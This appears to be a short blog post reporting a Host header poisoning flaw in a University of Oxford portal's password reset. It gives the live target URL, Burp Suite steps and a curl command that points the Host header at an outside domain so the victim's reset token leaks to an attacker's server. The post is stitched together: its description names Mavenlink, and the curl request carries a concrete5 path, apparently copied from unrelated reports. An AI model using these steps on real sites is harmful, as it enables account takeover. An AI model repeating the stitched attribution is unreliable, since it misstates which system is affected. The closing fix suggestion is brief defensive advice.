University of Oxford web Portal Vulnerability -Host header Poisoning
Hi Guyz found a very common Vulnerability in oxford’s web portal
Disclosed report -
Vulnerability Found: Host Header Poisoning
Description :
Modifying the Host header in Mavenlink’s password reset functionality would inject an attacker’s link into the password reset email.
When clicked, this would send the password reset token to the attacker’s server, allowing for the attacker to reset the target’s password.
Vulnerable URL :https://conted.ox.ac.uk/user/request_reset_password
- ) Open up Firefox and Burp Suite.)
2.) Visit the forgot password page (/user/request_reset_password)
3.) Enter the victim’s email address and click Reset and Email Password
4.) Intercept the HTTP request in Burp Suite & change the Host Header to your malicious site / server.
If the victim clicks the link, the reset token will be leaked and the attacker will be able to find the reset token in the server logs. The attacker can then browse to the reset page with the token and change the password of the victim account!
This can also be reproduced using the curl command
curl -i -s -k -X $’POST’ \
-H ‘Host:sxcurity.pro’ -H $’User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0' -H $’Content-Type: application/x-www-form-urlencoded’ -H $’Referer: http://<TARGET>/index.php/login/callback/concrete/forgot_password’ -H $’Upgrade-Insecure-Requests: 1' \
-b $’<COOKIES>’ \
— data-binary $’ccm_token=1494113992%3A02eb0471b7b6e3a498ba7e6b57573b04&uEmail=hacker1337%40gmail.com&resetPassword=’ \
$’https://conted.ox.ac.uk/user/request_reset_password'
FIX and Patches
Use $_SERVER[‘SERVER_NAME’] rather than $_SERVER[‘HTTP_HOST’]
Thanks for reading
